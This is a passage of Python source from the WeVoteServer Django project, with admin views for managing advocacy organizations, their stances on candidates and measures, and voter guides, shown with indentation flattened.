from wevote_functions.functions import convert_to_int, extract_twitter_handle_from_text_string, positive_value_exists, \
STATE_CODE_MAP
ORGANIZATION_STANCE_CHOICES = (
(SUPPORT, 'We Support'),
(OPPOSE, 'We Oppose'),
(INFORMATION_ONLY, 'Information Only - No stance'),
(STILL_DECIDING, 'We Are Still Deciding Our Stance'),
)
logger = wevote_functions.admin.get_logger(__name__)
# This page does not need to be protected.
class OrganizationsSyncOutView(APIView):
def __str__(self):
return str("")
def get(self, request, format=None):
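        # A GET with e.g. ?state_served_code=CA limits the response to
        # organizations serving California; with no parameter, every
        # organization is serialized.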
state_served_code = request.GET.get('state_served_code', '')
organization_list = Organization.objects.all()
if positive_value_exists(state_served_code):
organization_list = organization_list.filter(state_served_code__iexact=state_served_code)
serializer = OrganizationSerializer(organization_list, many=True, allow_null=True)
return Response(serializer.data)
@login_required
def organizations_import_from_master_server_view(request):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
state_code = request.GET.get('state_code', '')
results = organizations_import_from_master_server(request, state_code)
if not results['success']:
messages.add_message(request, messages.ERROR, results['status'])
else:
messages.add_message(request, messages.INFO, 'Organizations import completed. '
'Saved: {saved}, Updated: {updated}, '
'Master data not imported (local duplicates found): '
'{duplicates_removed}, '
'Not processed: {not_processed}'
''.format(saved=results['saved'],
updated=results['updated'],
duplicates_removed=results['duplicates_removed'],
not_processed=results['not_processed']))
return HttpResponseRedirect(reverse('admin_tools:sync_dashboard', args=()) + "?google_civic_election_id=" +
str(google_civic_election_id) + "&state_code=" + str(state_code))
@login_required
def organization_list_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
organization_state_code = request.GET.get('organization_state', '')
google_civic_election_id = request.GET.get('google_civic_election_id', '')
candidate_we_vote_id = request.GET.get('candidate_we_vote_id', '')
organization_search = request.GET.get('organization_search', '')
messages_on_stage = get_messages(request)
organization_list_query = Organization.objects.all()
if positive_value_exists(organization_state_code):
organization_list_query = organization_list_query.filter(state_served_code__iexact=organization_state_code)
if positive_value_exists(organization_search):
filters = []
new_filter = Q(organization_name__icontains=organization_search)
filters.append(new_filter)
new_filter = Q(organization_twitter_handle__icontains=organization_search)
filters.append(new_filter)
new_filter = Q(organization_website__icontains=organization_search)
filters.append(new_filter)
new_filter = Q(we_vote_id__icontains=organization_search)
filters.append(new_filter)
# Add the first query
if len(filters):
final_filters = filters.pop()
# ...and "OR" the remaining items in the list
for item in filters:
final_filters |= item
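            # The combined filter ORs the four icontains lookups, e.g. a search
            # for "sierra" matches organizations whose name, twitter handle,
            # website or we_vote_id contains "sierra" (case-insensitive).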
organization_list_query = organization_list_query.filter(final_filters)
organization_list_query = organization_list_query.order_by('organization_name')
organization_list = organization_list_query
state_list = STATE_CODE_MAP
sorted_state_list = sorted(state_list.items())
template_values = {
'messages_on_stage': messages_on_stage,
'candidate_we_vote_id': candidate_we_vote_id,
'google_civic_election_id': google_civic_election_id,
'organization_list': organization_list,
'organization_search': organization_search,
'organization_state': organization_state_code,
'state_list': sorted_state_list,
}
return render(request, 'organization/organization_list.html', template_values)
@login_required
def organization_new_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
# A positive value in google_civic_election_id means we want to create a voter guide for this org for this election
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
election_manager = ElectionManager()
upcoming_election_list = []
results = election_manager.retrieve_upcoming_elections()
if results['success']:
upcoming_election_list = results['election_list']
state_list = STATE_CODE_MAP
sorted_state_list = sorted(state_list.items())
messages_on_stage = get_messages(request)
template_values = {
'messages_on_stage': messages_on_stage,
'upcoming_election_list': upcoming_election_list,
'google_civic_election_id': google_civic_election_id,
'state_list': sorted_state_list,
}
return render(request, 'organization/organization_edit.html', template_values)
@login_required
def organization_edit_view(request, organization_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
# A positive value in google_civic_election_id means we want to create a voter guide for this org for this election
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
messages_on_stage = get_messages(request)
organization_id = convert_to_int(organization_id)
organization_on_stage_found = False
organization_manager = OrganizationManager()
organization_on_stage = Organization()
state_served_code = ''
results = organization_manager.retrieve_organization(organization_id)
if results['organization_found']:
organization_on_stage = results['organization']
state_served_code = organization_on_stage.state_served_code
organization_on_stage_found = True
election_manager = ElectionManager()
upcoming_election_list = []
results = election_manager.retrieve_upcoming_elections()
if results['success']:
upcoming_election_list = results['election_list']
state_list = STATE_CODE_MAP
sorted_state_list = sorted(state_list.items())
if organization_on_stage_found:
template_values = {
'messages_on_stage': messages_on_stage,
'organization': organization_on_stage,
'upcoming_election_list': upcoming_election_list,
'google_civic_election_id': google_civic_election_id,
'state_list': sorted_state_list,
'state_served_code': state_served_code,
}
else:
template_values = {
'messages_on_stage': messages_on_stage,
'upcoming_election_list': upcoming_election_list,
'google_civic_election_id': google_civic_election_id,
'state_list': sorted_state_list,
}
return render(request, 'organization/organization_edit.html', template_values)
@login_required
def organization_edit_process_view(request):
"""
Process the new or edit organization forms
:param request:
:return:
"""
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
organization_id = convert_to_int(request.POST.get('organization_id', 0))
organization_name = request.POST.get('organization_name', '')
organization_twitter_handle = request.POST.get('organization_twitter_handle', False)
organization_facebook = request.POST.get('organization_facebook', False)
organization_website = request.POST.get('organization_website', False)
wikipedia_page_title = request.POST.get('wikipedia_page_title', False)
wikipedia_photo_url = request.POST.get('wikipedia_photo_url', False)
state_served_code = request.POST.get('state_served_code', False)
# A positive value in google_civic_election_id or add_organization_button means we want to create a voter guide
# for this org for this election
google_civic_election_id = request.POST.get('google_civic_election_id', 0)
# add_organization_button = request.POST.get('add_organization_button', False)
# Filter incoming data
organization_twitter_handle = extract_twitter_handle_from_text_string(organization_twitter_handle)
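    # e.g. an input of "@WeVote" or "https://twitter.com/WeVote" is presumably
    # reduced to the bare handle "WeVote" (assumed behavior of
    # extract_twitter_handle_from_text_string, whose source is not shown here)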
# Check to see if this organization is already being used anywhere
organization_on_stage_found = False
try:
organization_query = Organization.objects.filter(id=organization_id)
if organization_query.count():
organization_on_stage = organization_query[0]
organization_on_stage_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
try:
if organization_on_stage_found:
# Update
if organization_name is not False:
organization_on_stage.organization_name = organization_name
if organization_twitter_handle is not False:
organization_on_stage.organization_twitter_handle = organization_twitter_handle
if organization_facebook is not False:
organization_on_stage.organization_facebook = organization_facebook
if organization_website is not False:
organization_on_stage.organization_website = organization_website
if wikipedia_page_title is not False:
organization_on_stage.wikipedia_page_title = wikipedia_page_title
if wikipedia_photo_url is not False:
organization_on_stage.wikipedia_photo_url = wikipedia_photo_url
if state_served_code is not False:
organization_on_stage.state_served_code = state_served_code
organization_on_stage.save()
organization_id = organization_on_stage.id
organization_we_vote_id = organization_on_stage.we_vote_id
messages.add_message(request, messages.INFO, 'Organization updated.')
else:
# Create new
# But first double-check that we don't have an org entry already
organization_email = ''
organization_list_manager = OrganizationListManager()
results = organization_list_manager.organization_search_find_any_possibilities(
organization_name, organization_twitter_handle, organization_website, organization_email)
if results['organizations_found']:
organizations_list = results['organizations_list']
organizations_count = len(organizations_list)
messages.add_message(request, messages.INFO, 'We found {count} existing organizations '
'that might match.'.format(count=organizations_count))
messages_on_stage = get_messages(request)
template_values = {
'messages_on_stage': messages_on_stage,
'organizations_list': organizations_list,
'organization_name': organization_name,
'organization_twitter_handle': organization_twitter_handle,
'organization_facebook': organization_facebook,
'organization_website': organization_website,
'wikipedia_page_title': wikipedia_page_title,
'wikipedia_photo_url': wikipedia_photo_url,
}
return render(request, 'organization/organization_edit.html', template_values)
minimum_required_variables_exist = positive_value_exists(organization_name)
if not minimum_required_variables_exist:
messages.add_message(request, messages.INFO, 'Missing name, which is required.')
messages_on_stage = get_messages(request)
template_values = {
'messages_on_stage': messages_on_stage,
'organization_name': organization_name,
'organization_twitter_handle': organization_twitter_handle,
'organization_facebook': organization_facebook,
'organization_website': organization_website,
'wikipedia_page_title': wikipedia_page_title,
'wikipedia_photo_url': wikipedia_photo_url,
}
return render(request, 'voter_guide/voter_guide_search.html', template_values)
organization_on_stage = Organization(
organization_name=organization_name,
)
if organization_twitter_handle is not False:
organization_on_stage.organization_twitter_handle = organization_twitter_handle
if organization_facebook is not False:
organization_on_stage.organization_facebook = organization_facebook
if organization_website is not False:
organization_on_stage.organization_website = organization_website
if wikipedia_page_title is not False:
organization_on_stage.wikipedia_page_title = wikipedia_page_title
if wikipedia_photo_url is not False:
organization_on_stage.wikipedia_photo_url = wikipedia_photo_url
if state_served_code is not False:
organization_on_stage.state_served_code = state_served_code
organization_on_stage.save()
organization_id = organization_on_stage.id
organization_we_vote_id = organization_on_stage.we_vote_id
messages.add_message(request, messages.INFO, 'New organization saved.')
except Exception as e:
messages.add_message(request, messages.ERROR, 'Could not save organization.'
' {error} [type: {error_type}]'.format(error=e,
error_type=type(e)))
return HttpResponseRedirect(reverse('organization:organization_list', args=()))
# Create voter_guide for this election?
if positive_value_exists(google_civic_election_id) and positive_value_exists(organization_we_vote_id):
election_manager = ElectionManager()
results = election_manager.retrieve_election(google_civic_election_id)
if results['election_found']:
election = results['election']
voter_guide_manager = VoterGuideManager()
results = voter_guide_manager.update_or_create_organization_voter_guide_by_election_id(
organization_we_vote_id, google_civic_election_id)
if results['voter_guide_saved']:
messages.add_message(request, messages.INFO, 'Voter guide for {election_name} election saved.'
''.format(election_name=election.election_name))
return HttpResponseRedirect(reverse('organization:organization_position_list', args=(organization_id,)) +
"?google_civic_election_id=" + str(google_civic_election_id))
@login_required
def organization_position_list_view(request, organization_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
messages_on_stage = get_messages(request)
organization_id = convert_to_int(organization_id)
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
candidate_we_vote_id = request.GET.get('candidate_we_vote_id', '')
organization_on_stage = Organization()
organization_on_stage_found = False
try:
organization_query = Organization.objects.filter(id=organization_id)
if organization_query.count():
organization_on_stage = organization_query[0]
organization_on_stage_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
organization_on_stage_found = False
if not organization_on_stage_found:
messages.add_message(request, messages.ERROR,
'Could not find organization when trying to retrieve positions.')
return HttpResponseRedirect(reverse('organization:organization_list', args=()))
else:
organization_position_list_found = False
try:
organization_position_list = PositionEntered.objects.order_by('stance')
organization_position_list = organization_position_list.filter(organization_id=organization_id)
if positive_value_exists(google_civic_election_id):
organization_position_list = organization_position_list.filter(
google_civic_election_id=google_civic_election_id)
organization_position_list = organization_position_list.order_by(
'google_civic_election_id', '-vote_smart_time_span')
if len(organization_position_list):
organization_position_list_found = True
except Exception as e:
organization_position_list = []
    # Refresh cached position info, keeping the refreshed objects so the
    # template renders current values instead of the stale evaluated queryset
    position_manager = PositionEnteredManager()
    organization_position_list = [
        position_manager.refresh_cached_position_info(one_position)
        for one_position in organization_position_list]
election_list = Election.objects.order_by('-election_day_text')
if organization_position_list_found:
template_values = {
'messages_on_stage': messages_on_stage,
'organization': organization_on_stage,
'organization_position_list': organization_position_list,
'election_list': election_list,
'google_civic_election_id': google_civic_election_id,
'candidate_we_vote_id': candidate_we_vote_id,
}
else:
template_values = {
'messages_on_stage': messages_on_stage,
'organization': organization_on_stage,
'election_list': election_list,
'google_civic_election_id': google_civic_election_id,
'candidate_we_vote_id': candidate_we_vote_id,
}
return render(request, 'organization/organization_position_list.html', template_values)
@login_required
def organization_position_new_view(request, organization_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
authority_results = retrieve_voter_authority(request)
if not voter_has_authority(request, authority_required, authority_results):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
candidate_we_vote_id = request.GET.get('candidate_we_vote_id', False)
measure_we_vote_id = request.GET.get('measure_we_vote_id', False)
# Take in some incoming values
candidate_and_measure_not_found = request.GET.get('candidate_and_measure_not_found', False)
stance = request.GET.get('stance', SUPPORT) # Set a default if stance comes in empty
    statement_text = request.GET.get('statement_text', '')  # Set a default if statement_text comes in empty
more_info_url = request.GET.get('more_info_url', '')
# We pass candidate_we_vote_id to this page to pre-populate the form
candidate_campaign_id = 0
if positive_value_exists(candidate_we_vote_id):
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign_from_we_vote_id(candidate_we_vote_id)
if results['candidate_campaign_found']:
candidate_campaign = results['candidate_campaign']
candidate_campaign_id = candidate_campaign.id
# We pass candidate_we_vote_id to this page to pre-populate the form
contest_measure_id = 0
if positive_value_exists(measure_we_vote_id):
contest_measure_manager = ContestMeasureManager()
results = contest_measure_manager.retrieve_contest_measure_from_we_vote_id(measure_we_vote_id)
if results['contest_measure_found']:
contest_measure = results['contest_measure']
contest_measure_id = contest_measure.id
messages_on_stage = get_messages(request)
organization_id = convert_to_int(organization_id)
all_is_well = True
organization_on_stage_found = False
organization_on_stage = Organization()
try:
organization_on_stage = Organization.objects.get(id=organization_id)
organization_on_stage_found = True
except Organization.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except Organization.DoesNotExist:
        # Not found; an error message is shown just below (no new organization is created here)
pass
if not organization_on_stage_found:
messages.add_message(request, messages.INFO,
'Could not find organization when trying to create a new position.')
return HttpResponseRedirect(reverse('organization:organization_position_list', args=([organization_id])))
# Prepare a drop down of candidates competing in this election
candidate_campaign_list = CandidateCampaignListManager()
candidate_campaigns_for_this_election_list = []
results = candidate_campaign_list.retrieve_all_candidates_for_upcoming_election(google_civic_election_id, True)
if results['candidate_list_found']:
candidate_campaigns_for_this_election_list = results['candidate_list_objects']
# Prepare a drop down of measures in this election
contest_measure_list = ContestMeasureList()
contest_measures_for_this_election_list = []
results = contest_measure_list.retrieve_all_measures_for_upcoming_election(google_civic_election_id, True)
if results['measure_list_found']:
contest_measures_for_this_election_list = results['measure_list_objects']
try:
organization_position_list = PositionEntered.objects.order_by('stance')
organization_position_list = organization_position_list.filter(organization_id=organization_id)
if positive_value_exists(google_civic_election_id):
organization_position_list = organization_position_list.filter(
google_civic_election_id=google_civic_election_id)
organization_position_list = organization_position_list.order_by(
'google_civic_election_id', '-vote_smart_time_span')
if len(organization_position_list):
organization_position_list_found = True
except Exception as e:
organization_position_list = []
if all_is_well:
election_list = Election.objects.order_by('-election_day_text')
template_values = {
'candidate_campaigns_for_this_election_list': candidate_campaigns_for_this_election_list,
'candidate_campaign_id': candidate_campaign_id,
'contest_measures_for_this_election_list': contest_measures_for_this_election_list,
'contest_measure_id': contest_measure_id,
'messages_on_stage': messages_on_stage,
'organization': organization_on_stage,
'organization_position_candidate_campaign_id': 0,
'possible_stances_list': ORGANIZATION_STANCE_CHOICES,
'stance_selected': stance,
'election_list': election_list,
'google_civic_election_id': google_civic_election_id,
'organization_position_list': organization_position_list,
'voter_authority': authority_results,
# Incoming values from error state
'candidate_and_measure_not_found': candidate_and_measure_not_found,
'stance': stance,
'statement_text': statement_text,
'more_info_url': more_info_url,
}
return render(request, 'organization/organization_position_edit.html', template_values)
@login_required
def organization_delete_existing_position_process_form_view(request, organization_id, position_we_vote_id):
"""
:param request:
:param organization_id:
:param position_we_vote_id:
:return:
"""
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
organization_id = convert_to_int(organization_id)
# Get the existing position
organization_position_on_stage_found = False
if positive_value_exists(position_we_vote_id):
organization_position_on_stage = PositionEntered()
organization_position_on_stage_found = False
position_entered_manager = PositionEnteredManager()
results = position_entered_manager.retrieve_position_from_we_vote_id(position_we_vote_id)
if results['position_found']:
organization_position_on_stage_found = True
organization_position_on_stage = results['position']
if not organization_position_on_stage_found:
messages.add_message(request, messages.INFO,
"Could not find this organization's position when trying to delete.")
return HttpResponseRedirect(reverse('organization:organization_position_list', args=([organization_id])))
try:
organization_position_on_stage.delete()
except Exception as e:
handle_record_not_deleted_exception(e, logger=logger)
messages.add_message(request, messages.ERROR,
'Could not delete position.')
return HttpResponseRedirect(reverse('organization:organization_position_list', args=([organization_id])))
messages.add_message(request, messages.INFO,
'Position deleted.')
    return HttpResponseRedirect(reverse('organization:organization_position_list', args=([organization_id])))
@login_required
def organization_position_edit_view(request, organization_id, position_we_vote_id):
"""
In edit, you can only change your stance and comments, not who or what the position is about
:param request:
:param organization_id:
:param position_we_vote_id:
:return:
"""
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
messages_on_stage = get_messages(request)
organization_id = convert_to_int(organization_id)
organization_on_stage_found = False
try:
organization_on_stage = Organization.objects.get(id=organization_id)
organization_on_stage_found = True
except Organization.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except Organization.DoesNotExist:
        # Not found; an error message is shown just below
pass
if not organization_on_stage_found:
messages.add_message(request, messages.INFO,
'Could not find organization when trying to edit a position.')
return HttpResponseRedirect(reverse('organization:organization_position_list', args=([organization_id])))
# Get the existing position
organization_position_on_stage = PositionEntered()
organization_position_on_stage_found = False
position_entered_manager = PositionEnteredManager()
results = position_entered_manager.retrieve_position_from_we_vote_id(position_we_vote_id)
if results['position_found']:
organization_position_on_stage_found = True
organization_position_on_stage = results['position']
if not organization_position_on_stage_found:
messages.add_message(request, messages.INFO,
'Could not find organization position when trying to edit.')
return HttpResponseRedirect(reverse('organization:organization_position_list', args=([organization_id])))
# Note: We have access to the candidate campaign through organization_position_on_stage.candidate_campaign
election_list = Election.objects.all()
if organization_position_on_stage_found:
template_values = {
'is_in_edit_mode': True,
'messages_on_stage': messages_on_stage,
'organization': organization_on_stage,
'organization_position': organization_position_on_stage,
'possible_stances_list': ORGANIZATION_STANCE_CHOICES,
'stance_selected': organization_position_on_stage.stance,
'election_list': election_list,
'google_civic_election_id': google_civic_election_id,
}
return render(request, 'organization/organization_position_edit.html', template_values)
@login_required
def organization_position_edit_process_view(request):
"""
:param request:
:return:
"""
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = convert_to_int(request.POST.get('google_civic_election_id', 0))
organization_id = convert_to_int(request.POST.get('organization_id', 0))
position_we_vote_id = request.POST.get('position_we_vote_id', '')
candidate_campaign_id = convert_to_int(request.POST.get('candidate_campaign_id', 0))
contest_measure_id = convert_to_int(request.POST.get('contest_measure_id', 0))
stance = request.POST.get('stance', SUPPORT) # Set a default if stance comes in empty
    statement_text = request.POST.get('statement_text', '')  # Set a default if statement_text comes in empty
more_info_url = request.POST.get('more_info_url', '')
go_back_to_add_new = False
candidate_campaign_we_vote_id = ""
google_civic_candidate_name = ""
contest_measure_we_vote_id = ""
google_civic_measure_title = ""
candidate_campaign_on_stage_found = False
contest_measure_on_stage_found = False
organization_position_on_stage = PositionEntered()
organization_on_stage = Organization()
candidate_campaign_on_stage = CandidateCampaign()
contest_measure_on_stage = ContestMeasure()
state_code = ""
position_entered_manager = PositionEnteredManager()
# Make sure this is a valid organization before we try to save a position
organization_on_stage_found = False
organization_we_vote_id = ""
try:
organization_query = Organization.objects.filter(id=organization_id)
if organization_query.count():
organization_on_stage = organization_query[0]
organization_we_vote_id = organization_on_stage.we_vote_id
organization_on_stage_found = True
except Exception as e:
# If we can't retrieve the organization, we cannot proceed
handle_record_not_found_exception(e, logger=logger)
if not organization_on_stage_found:
messages.add_message(
request, messages.ERROR,
"Could not find the organization when trying to create or edit a new position.")
return HttpResponseRedirect(reverse('organization:organization_list', args=()))
# Now retrieve the CandidateCampaign or the ContestMeasure so we can save it with the Position
# We need either candidate_campaign_id or contest_measure_id
if candidate_campaign_id:
try:
candidate_campaign_on_stage = CandidateCampaign.objects.get(id=candidate_campaign_id)
candidate_campaign_on_stage_found = True
candidate_campaign_we_vote_id = candidate_campaign_on_stage.we_vote_id
google_civic_candidate_name = candidate_campaign_on_stage.google_civic_candidate_name
state_code = candidate_campaign_on_stage.state_code
except CandidateCampaign.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except CandidateCampaign.DoesNotExist as e:
handle_record_not_found_exception(e, logger=logger)
if not candidate_campaign_on_stage_found:
messages.add_message(
request, messages.ERROR,
"Could not find Candidate's campaign when trying to create or edit a new position.")
if positive_value_exists(position_we_vote_id):
return HttpResponseRedirect(
                reverse('organization:organization_position_edit', args=(organization_id, position_we_vote_id)) +
"?google_civic_election_id=" + str(google_civic_election_id) +
"&stance=" + stance +
"&statement_text=" + statement_text +
"&more_info_url=" + more_info_url +
"&candidate_and_measure_not_found=1"
)
else:
return HttpResponseRedirect(
reverse('organization:organization_position_new', args=([organization_id])) +
"?google_civic_election_id=" + str(google_civic_election_id) +
"&stance=" + stance +
"&statement_text=" + statement_text +
"&more_info_url=" + more_info_url +
"&candidate_and_measure_not_found=1"
)
contest_measure_id = 0
elif contest_measure_id:
try:
contest_measure_on_stage = ContestMeasure.objects.get(id=contest_measure_id)
contest_measure_on_stage_found = True
contest_measure_we_vote_id = contest_measure_on_stage.we_vote_id
google_civic_measure_title = contest_measure_on_stage.google_civic_measure_title
state_code = contest_measure_on_stage.state_code
        except ContestMeasure.MultipleObjectsReturned as e:
            handle_record_found_more_than_one_exception(e, logger=logger)
        except ContestMeasure.DoesNotExist as e:
            handle_record_not_found_exception(e, logger=logger)
if not contest_measure_on_stage_found:
messages.add_message(
request, messages.ERROR,
"Could not find measure when trying to create or edit a new position.")
if positive_value_exists(position_we_vote_id):
return HttpResponseRedirect(
                reverse('organization:organization_position_edit', args=(organization_id, position_we_vote_id)) +
"?google_civic_election_id=" + str(google_civic_election_id) +
"&stance=" + stance +
"&statement_text=" + statement_text +
"&more_info_url=" + more_info_url +
"&candidate_and_measure_not_found=1"
)
else:
return HttpResponseRedirect(
reverse('organization:organization_position_new', args=([organization_id])) +
"?google_civic_election_id=" + str(google_civic_election_id) +
"&stance=" + stance +
"&statement_text=" + statement_text +
"&more_info_url=" + more_info_url +
"&candidate_and_measure_not_found=1"
)
candidate_campaign_id = 0
else:
messages.add_message(
request, messages.ERROR,
"Unable to find either Candidate or Measure.")
return HttpResponseRedirect(
reverse('organization:organization_position_new', args=([organization_id])) +
"?google_civic_election_id=" + str(google_civic_election_id) +
"&stance=" + stance +
"&statement_text=" + statement_text +
"&more_info_url=" + more_info_url +
"&candidate_and_measure_not_found=1"
)
organization_position_on_stage_found = False
# Retrieve position from position_we_vote_id if it exists already
if positive_value_exists(position_we_vote_id):
results = position_entered_manager.retrieve_position_from_we_vote_id(position_we_vote_id)
if results['position_found']:
organization_position_on_stage_found = True
organization_position_on_stage = results['position']
organization_position_found_from_new_form = False
if not organization_position_on_stage_found: # Position not found from position_we_vote_id
# If a position_we_vote_id hasn't been passed in, then we are trying to create a new position.
# Check to make sure a position for this org, candidate and election doesn't already exist
if candidate_campaign_id:
results = position_entered_manager.retrieve_organization_candidate_campaign_position(
organization_id, candidate_campaign_id, google_civic_election_id)
elif contest_measure_id:
results = position_entered_manager.retrieve_organization_contest_measure_position(
organization_id, contest_measure_id, google_civic_election_id)
else:
messages.add_message(
request, messages.ERROR,
"Missing both candidate_campaign_id and contest_measure_id.")
return HttpResponseRedirect(
reverse('organization:organization_position_list', args=([organization_id]))
)
if results['MultipleObjectsReturned']:
messages.add_message(
request, messages.ERROR,
"We found more than one existing positions for this candidate. Please delete all but one position.")
return HttpResponseRedirect(
reverse('organization:organization_position_list', args=([organization_id]))
)
elif results['position_found']:
organization_position_on_stage_found = True
organization_position_on_stage = results['position']
organization_position_found_from_new_form = True
# Now save existing, or create new
success = False
try:
if organization_position_on_stage_found:
# Update the position
organization_position_on_stage.stance = stance
organization_position_on_stage.google_civic_election_id = google_civic_election_id
if not organization_position_found_from_new_form or positive_value_exists(more_info_url):
# Only update this if we came from update form, or there is a value in the incoming variable
organization_position_on_stage.more_info_url = more_info_url
if not organization_position_found_from_new_form or positive_value_exists(statement_text):
# Only update this if we came from update form, or there is a value in the incoming variable
organization_position_on_stage.statement_text = statement_text
if not positive_value_exists(organization_position_on_stage.organization_we_vote_id):
organization_position_on_stage.organization_we_vote_id = organization_on_stage.we_vote_id
organization_position_on_stage.candidate_campaign_id = candidate_campaign_id
organization_position_on_stage.candidate_campaign_we_vote_id = candidate_campaign_we_vote_id
organization_position_on_stage.google_civic_candidate_name = google_civic_candidate_name
organization_position_on_stage.contest_measure_id = contest_measure_id
organization_position_on_stage.contest_measure_we_vote_id = contest_measure_we_vote_id
organization_position_on_stage.google_civic_measure_title = google_civic_measure_title
organization_position_on_stage.state_code = state_code
organization_position_on_stage.save()
organization_position_on_stage = position_entered_manager.refresh_cached_position_info(
organization_position_on_stage)
success = True
if positive_value_exists(candidate_campaign_we_vote_id):
messages.add_message(
request, messages.INFO,
"Position on {candidate_name} updated.".format(
candidate_name=candidate_campaign_on_stage.display_candidate_name()))
elif positive_value_exists(contest_measure_we_vote_id):
messages.add_message(
request, messages.INFO,
"Position on {measure_title} updated.".format(
measure_title=contest_measure_on_stage.measure_title))
else:
# Create new
# Note that since we are processing a volunteer/admin entry tool, we can always save to the PositionEntered
# table, and don't need to worry about PositionForFriends
organization_position_on_stage = PositionEntered(
organization_id=organization_id,
organization_we_vote_id=organization_we_vote_id,
candidate_campaign_id=candidate_campaign_id,
candidate_campaign_we_vote_id=candidate_campaign_we_vote_id,
google_civic_candidate_name=google_civic_candidate_name,
contest_measure_id=contest_measure_id,
contest_measure_we_vote_id=contest_measure_we_vote_id,
google_civic_measure_title=google_civic_measure_title,
google_civic_election_id=google_civic_election_id,
stance=stance,
statement_text=statement_text,
more_info_url=more_info_url,
state_code=state_code,
)
organization_position_on_stage.save()
organization_position_on_stage = position_entered_manager.refresh_cached_position_info(
organization_position_on_stage)
success = True
if positive_value_exists(candidate_campaign_we_vote_id):
messages.add_message(
request, messages.INFO,
"New position on {candidate_name} saved.".format(
candidate_name=candidate_campaign_on_stage.display_candidate_name()))
elif positive_value_exists(contest_measure_we_vote_id):
messages.add_message(
request, messages.INFO,
"New position on {measure_title} saved.".format(
measure_title=contest_measure_on_stage.measure_title))
go_back_to_add_new = True
    except Exception as e:
        # Don't fail silently; record the exception and surface it to the admin
        handle_record_not_saved_exception(e, logger=logger)
        messages.add_message(request, messages.ERROR,
                             'Could not save position. {error} [type: {error_type}]'.format(
                                 error=e, error_type=type(e)))
# If the position was saved, then update the voter_guide entry
if success:
voter_guide_manager = VoterGuideManager()
results = voter_guide_manager.update_or_create_organization_voter_guide_by_election_id(
organization_on_stage.we_vote_id, google_civic_election_id)
# if results['success']:
if go_back_to_add_new:
return HttpResponseRedirect(
reverse('organization:organization_position_new', args=(organization_on_stage.id,)) +
"?google_civic_election_id=" + str(google_civic_election_id))
else:
return HttpResponseRedirect(
reverse('organization:organization_position_list', args=(organization_on_stage.id,)))
```
#### File: WeVoteServer/voter_guide/views_admin.py
```python
from .controllers import voter_guides_import_from_master_server
from .models import VoterGuide, VoterGuideListManager, VoterGuideManager
from .serializers import VoterGuideSerializer
from admin_tools.views import redirect_to_sign_in_page
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.contrib.messages import get_messages
from django.http import HttpResponseRedirect
from django.shortcuts import render
from election.models import Election, ElectionManager, TIME_SPAN_LIST
from organization.models import Organization, OrganizationListManager
from organization.views_admin import organization_edit_process_view
from position.models import PositionEntered, PositionForFriends, PositionListManager
from rest_framework.views import APIView
from rest_framework.response import Response
from voter.models import voter_has_authority
from wevote_functions.functions import convert_to_int, extract_twitter_handle_from_text_string, positive_value_exists, \
STATE_CODE_MAP
# This page does not need to be protected.
class VoterGuidesSyncOutView(APIView):
def get(self, request, format=None):
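        # A positive google_civic_election_id query parameter limits the
        # payload to that election's voter guides; otherwise all are returned.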
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
voter_guide_list = VoterGuide.objects.all()
if positive_value_exists(google_civic_election_id):
voter_guide_list = voter_guide_list.filter(google_civic_election_id=google_civic_election_id)
serializer = VoterGuideSerializer(voter_guide_list, many=True)
return Response(serializer.data)
@login_required
def voter_guides_import_from_master_server_view(request):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
state_code = request.GET.get('state_code', '')
results = voter_guides_import_from_master_server(request, google_civic_election_id)
if not results['success']:
messages.add_message(request, messages.ERROR, results['status'])
else:
messages.add_message(request, messages.INFO, 'Voter Guides import completed. '
'Saved: {saved}, Updated: {updated}, '
'Master data not imported (local duplicates found): '
'{duplicates_removed}, '
'Not processed: {not_processed}'
''.format(saved=results['saved'],
updated=results['updated'],
duplicates_removed=results['duplicates_removed'],
not_processed=results['not_processed']))
return HttpResponseRedirect(reverse('admin_tools:sync_dashboard', args=()) + "?google_civic_election_id=" +
str(google_civic_election_id) + "&state_code=" + str(state_code))
@login_required
def generate_voter_guides_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
voter_guide_stored_for_this_organization = []
# voter_guide_stored_for_this_public_figure = []
# voter_guide_stored_for_this_voter = []
voter_guide_created_count = 0
voter_guide_updated_count = 0
# What elections do we want to generate voter_guides for?
election_list = Election.objects.all()
# Cycle through organizations
